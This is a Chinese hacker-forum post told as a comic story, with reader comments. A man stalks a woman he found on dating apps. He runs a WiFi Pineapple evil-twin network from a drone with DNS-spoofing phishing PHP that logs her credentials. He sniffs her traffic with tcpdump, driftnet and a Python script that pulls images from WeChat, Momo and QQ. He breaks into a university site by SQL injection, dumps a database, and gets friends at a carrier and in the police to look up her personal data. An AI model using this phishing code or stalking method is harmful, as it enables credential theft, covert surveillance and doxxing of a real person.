卧薪尝胆只为你(屌丝黑客"追"妹记第二集)
「好大的一朵菊花哟~」
-----------------------------
< / Scorpion echo ‘世界由我来守护’>
PS:大家当小说看不要以技术的眼光去评判,不当之处请忽略勿喷 内行人看门道,外行人看热闹,请不要再教我如何把妹了,就当一个热闹和故事来看就行了
精彩回顾:第一集地址https://www.t00ls.com/thread-31253-1-1.html
第一章:“约炮神器”帮我找到了她
在上一集中Only成功的吓走了妹子,妹子回去对电脑进行了全面的杀毒,最终Only的权限还是掉了,他有一点点的失落,只盼着有一天能和她在人群中相遇,就想问她一句话“为什么要杀毒”
这天Only跟平常一样熟练的打开各种社交软件在搜附近人,什么QQ啊微信啊,陌陌啊,探探啊,派派啊都被Only玩的了如指掌,突然看到这么一个消息,
Only表现的是异常兴奋啊,这不就是自己的"梦中情人"
“0.75KM”Only拿这手机出去寻找着,最终确定了妹子所在的位置,Only高兴的跑了回来,带上所有的装备前往目的地,北方的3月天气里,晚上吹着小风,有点冷飕飕的感觉,Only带了好几个装逼神器,所用的装备有
1、军区大衣加手套一双,口罩一个,
2、航拍飞行器,
3、WiFi Pineapple
4、3G无线网卡
5、一个超大功率的无线网卡卡皇
7、笔记本一套
听到这我表示很诧异,这货是预谋已久啊,从装备上来看果然是黑阔,Only来到了妹子所在的单元楼下,找了一个阴暗的角落,把无线网卡插到WiFi Pineapple的USB上后进行设置
设置完后把WiFi Pineapple的无线密码改成了conspiracy,然后配置了一个钓鱼站点,他用的是WiFi Pineapple里面的DNS欺骗当然我们可以用别的方法来欺骗
意思就是修改一个网页把提交的表单修改和error.php里一样然后我们在我们修改的网页中输入账号密码会提交到error.php里然后保存到/tmp/pineapple-phish.log里面,而redirect.php就是我们DNS欺骗用到的,当我们输入的网址内含有COM会跳转到WiFi Pineapple - Login.htm(我们修改的网页)
redirect.php:
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "com")){
header('Status: 302 Found');
header('Location: WiFi Pineapple - Login.html');
}
require('error.php');
?>
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("/tmp/pineapple-phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body>
</body></html>
PS:做的有点丑,大家凑合看就行了
Only做好后开启了DNS欺骗模式
然后将菠萝派安置到了飞行器上,笔记本连上卡皇后再链接上菠萝派的wifi(此目的是因为飞行器飞高后wifi的范围丢失,所以用的卡皇)
这时候看妹子距离我不过30M左右,操控这飞行器飞到2-3楼的中间
然后Only在陌陌中告诉了妹子wifi名称和密码,看到消息已读,Only邪恶的笑了,不一会妹子回复了个"谢谢"
一股股寒风吹过,Only不停的刷新着文件夹希望出现期盼中的pineapple-phish.log,难得妹纸没连上?
确实有连上啊,2个设备.151是我,.24肯定是妹纸了,但还是仍不住在陌陌上问了下妹纸,
“连上了吗?”
“恩”
Only疑惑为什么不上网呢,难得妹纸就是只在聊天看视频? Only想向妹纸推送一个网页自动弹出,但是又想起上次的结果,这次一定要忍住,决不能打草惊蛇,Only默默的念着,不知不觉已经到了晚上8点,一股股寒风袭来,Only不经意的打了个颤,有点迷糊了,差点睡着了,刷新了下文件夹,Only喜出望外,看到了梦寐以求的pineapple-phish.log
然后一看手机,看到了妹子发来的信息
“为什么打不开网页,一直提示让我认证”
Only立马回复
“应该是路由出错了,我重启下”
妹子没有怀疑,Only立马关掉了DNS欺骗,差点吓死了,Only默念着,出了一头的冷汗,Only立马搜索微信验真伪,看来是真的,知道了妹子的QQ,手机以及微信,Only本想着以及得到了想要的赶紧撤,谁知道好奇心太重,开启了URL Snarf (kali同理),于是准备一探虚实
PS:以下是本地手机演示
看到这一排排数据,Only显得越发的高兴
然后他把数据拷贝下来准备读取数据
PS:这是视频
当然还有一些小视频啊,语音啊 空间的说说啊 快手之类的,大家自由发挥吧
du.py:
import re
text = open("1.txt", "r")
png = open('text3.html','w')
while True:
line = text.readline()
if 'mmsns.qpic.cn' in line:
pat = re.compile('GET(.*)?tp=',re.S) # 微信圈的图片
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
if 'img.momocdn.com/feedimage/' in line:
pat = re.compile('GET(.*?)webp',re.S) # 陌陌圈的嗅探
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'jpg></img>'
print text3
png.write(text3)
if 'nipic.com' in line:
pat = re.compile('GET(.*?) HTTP',re.S) # QQ相册
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
text.close()
png.close()
读取一个指定pcap数据包中的图片:
driftnet -f /home/dump_1443200994.pcap -a -d /home/
tcpdump -i wlan0 -nn -w /mnt/sda1/tcpdump.cap port 80 &
也许是因为Only太无聊了吧,看了一会也没有发现什么妹子的自拍视频之类的
额外的还是有一些失落的,收拾了下Only准备回家了,这次Only并没有视图这去获取权限什么的,只是简单的得到了一些信息,回去后妹子发来了信息,问为什么没网了,
Only回答到 “我要睡觉了”,
妹子无奈的"哦”了一下
也没有聊了起来,因为这样的社交软件上献殷勤势必会引起妹子的反感的
第二章:为了你我做什么都可以
Only回去后在各种裤子查起了妹子的QQ号,手机号之类的,各种百度,搜狗 谷歌,最终眼睛一亮,一网站出现了妹子的手机号,点开后原来是某某大学的网站,原来是个舞蹈老师,上面清楚的写着在那次比赛中得了第一名,名字 电话,Only又邪恶了
“难不成又要我日站?我勒个X”
想想都觉得累
打开网站翻了翻果然有
既然旁站好几个,那就柿子就挑软的捏
Only拿出了WebRobot爬了下站
神器就是神器啊果然很强,但是效果还不是很明显,在官方上找啊找啊找,点开新闻中心后是这样子的
难不成把参数隐藏了
继续拿神器来扫下
点开抓取链接 果然被猜到了 是真的
全部发送注入扫描里
看来是存在注入的,那已经成功了一半了
本想着手工拿下 可以一注入 不管输入什么就弹回去了,用什么萝卜头啊之类的也没用,卧槽,看来还是得神器来搞
果然神器就是神器,不一会出现了Only想要的东西
然后登录后台
“ 卧槽,这么简单,搞毛啊,为什么啊测试版,这算个毛啊 %¥@#!@# ”
Only仍不住的骂了起来
但是还是静下心来,右手掏进右边口袋,取了一盒东西出来,掏出一根白色的
类似柱状的物体放在嘴里叼着,左手插入左边口袋取出打火机,右手成弯弓状态护住左手打火机点燃了哪根柱状物体,深吸一口,美妙极了!
仔细的看了看网站,最终还是发现了一个突破口
“ 卧槽,什么情况,玩我呢,这么简单的站居然有这么傻逼的洞!害的我还白失落了一会 ”
Only拿到shell后 root权限
这站让Only一头冷汗,好让人蒙羞啊,Only激动不已,这管理果然是SB,从后台的那几个"测试版"大字上就猜到了,
“看来这是老天要帮我啊”
Only登上服务器脱下裤子
日了个底朝天,最终Only想要的还是工资查询的裤子
Only是什么都想干,什么都想挑战,这时候Only想这么SB的管理员难道注入可以直接写shell?又一次得到了验证
拿到数据库后,Only搜索了下名字,得到身份证后,这下Only发大招了,把查出来的身份证号发给了自己的2个朋友,
一个在运营商那里,一个是警察,得到了以下信息(人生在世,没有几个各行各业的朋友,还活什么,必要时可以像这样帮下忙)
确定了妹子的手机号和自己得到的是同一个,也没有其他手机号,也确定了妹子的个人信息和家庭信息
但是Only为什么要得到这些信息?
得到这些信息后他又要干什么呢?
Only又会做一些什么疯狂的事情呢?
和妹子会有什么奇妙的故事发生呢?
这一切的一切都成了迷
想知道答案的话
尽情期待下一集
<Only失忆了>
自评TCV值(5)
评论230次
第一集过来的快更
额,怎么感觉你有点可怕了...
第一集过来的哈哈哈哈哈哈
秀技术是泡不到白富美的。
土豪的设备很全啊。。
老哥,这是什么工具啊 就哪个爬url的那个
这样是追不到妹子的
哈哈 ,来了,吃苹果围观
还是第一集比较真实
技术很牛啊,情节也不错。
我竟然看完了 真的6 期待第三集
其实也挺好看的
这明明是土豪把妹记!!!!
写小说估计比这个给力多了 太给力了
最后她有男朋友了
渗透玩的再好,也入侵不了你的心
1、军区大衣加手套一双,口罩一个, 2、航拍飞行器, 3、WiFi Pineapple 4、3G无线网卡 5、一个超大功率的无线网卡卡皇 7、笔记本一套 我直接拿飞行器递情书是不是更快一点。
完美诠释了:渗透玩的再强,也不能提权进你的心
感觉有点假啊,大疆的无人机一般也就40多分钟,你的电池能用这么久?
这故事可真精彩,学xi了